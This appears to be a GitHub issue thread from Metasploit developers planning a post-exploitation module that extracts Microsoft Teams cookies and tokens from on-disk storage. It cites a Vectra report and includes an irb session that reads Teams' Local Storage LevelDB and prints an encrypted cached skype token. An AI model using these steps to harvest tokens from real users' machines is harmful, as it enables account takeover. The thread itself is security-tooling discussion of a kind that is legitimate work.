cn-kali-team
commented
1 year ago If Ruby has a library to parse leveldb, I can complete this module
Open h00die opened 1 year ago
cn-kali-team
commented
1 year ago If Ruby has a library to parse leveldb, I can complete this module
h00die
commented
1 year ago looking like 3 options, the first 2 are 9+yrs old, so who knows if they work.
cn-kali-team
commented
1 year ago I'm now ready to write a module for electron. It should be able to extract cookies and data saved in localstorage.
cn-kali-team
commented
1 year ago https://github.com/DAddYE/leveldb
irb(main):002:0> require 'leveldb' [0/333]
/home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/fiddler-rb-0.1.2/lib/fiddler.rb:51:in `initialize': wrong number of arguments (given 5, expected 3..4) (ArgumentError)
from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/fiddler-rb-0.1.2/lib/fiddler.rb:51:in `new'
from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/fiddler-rb-0.1.2/lib/fiddler.rb:51:in `cdef'
from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/leveldb-0.1.9/lib/native.rb:12:in `<module:Native>'
from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/leveldb-0.1.9/lib/native.rb:4:in `<module:LevelDB>'
from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/leveldb-0.1.9/lib/native.rb:3:in `<top (required)>'
from <internal:/home/kali-team/.rbenv/versions/3.0.2/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
from <internal:/home/kali-team/.rbenv/versions/3.0.2/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/leveldb-0.1.9/lib/leveldb.rb:1:in `<top (required)>'
from <internal:/home/kali-team/.rbenv/versions/3.0.2/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
from <internal:/home/kali-team/.rbenv/versions/3.0.2/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
from (irb):2:in `<main>'
from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/irb-1.4.3/exe/irb:11:in `<top (required)>'
from /home/kali-team/.rbenv/versions/3.0.2/bin/irb:23:in `load'
from /home/kali-team/.rbenv/versions/3.0.2/bin/irb:23:in `<main>'
Unfortunately, the skype certificate I got in the latest version of the test has been encrypted. If I want to complete this module, it may take more time to reverse engineer.
➜ metasploit-framework git:(MicrosoftTeams) ✗ irb [25/1913]
irb(main):001:0> require 'leveldb-native'
=> true
irb(main):002:0> db = LevelDBNative::DB.new '/home/kali-team/VD/Teams/Local Storage/leveldb/'
=> <LevelDBNative::DB "/home/kali-team/VD/Teams/Local Storage/leveldb/">
irb(main):003:0> db.keys
=>
["META:https://teams.microsoft.com",
"VERSION",
"_https://teams.microsoft.com\x00\x01isEncryptionKeySet",
"_https://teams.microsoft.com\x00\x01ts.TS_ADDITIONAL_SETTINGS",
"_https://teams.microsoft.com\x00\x01ts.TS_OVERRIDE_SETTINGS",
"_https://teams.microsoft.com\x00\x01ts.appliedActiveTheme",
"_https://teams.microsoft.com\x00\x01ts.cdlSharedWorkerJsUrl",
"_https://teams.microsoft.com\x00\x01ts.cdlWorkerType",
"_https://teams.microsoft.com\x00\x01ts.enableSetRegionCookieTenantSwitchGcctoAnyRegV2",
"_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.CallingDropsCollectorService:CallEntries",
"_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.Teamspace.Search.Recent",
"_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.cache-status-data",
"_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.cache.token.https://api.spaces.skype.com",
"_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.currentConversationTableVersion",
"_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.currentConversationVersion",
"_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.enableDataLayerWorkerMessaging",
"_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.enableStartupUsingPartialData",
"_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.ss.navigationIndex",
"_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.ss.navigationStack",
"_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.useReplyChainStoreV2",
"_https://teams.microsoft.com\x00\x01ts.indexDbs",
"_https://teams.microsoft.com\x00\x01ts.latestOid",
"_https://teams.microsoft.com\x00\x01ts.nonLoggedInUserLocation",
"_https://teams.microsoft.com\x00\x01ts.openDbs",
"_https://teams.microsoft.com\x00\x01ts.previousSessionLogs",
"_https://teams.microsoft.com\x00\x01ts.puid",
"_https://teams.microsoft.com\x00\x01ts.tenantList_0003BFFD09DBD369",
"_https://teams.microsoft.com\x00\x01ts.upgradeV2Themes",
"_https://teams.microsoft.com\x00\x01ts.userInfo"]
irb(main):004:0> db.get("_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.cache.token.https://api.spaces.s
kype.com")
=> "\x01{\"token\":\"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\",\"aud\":\"https://api.spaces.skype.com\",\"expiration\":1671439042,\"isEncrypted\":true}"
Summary
https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
From the article: "In August 2022, the Vectra Protect team identified a post-exploitation opportunity allowing malicious actors with sufficient local or remote file system access to steal valid user credentials from Microsoft Teams due to their plaintext storage on disk. This plaintext credential management was determined to impact all commercial and GCC Desktop Teams clients for Windows, Mac, and Linux."
Microsoft teams has a sqlite database which contains a valid cookie for a teams person. Article lays out how to retrieve it, where they are etc. Feels like a pretty good and easy post module.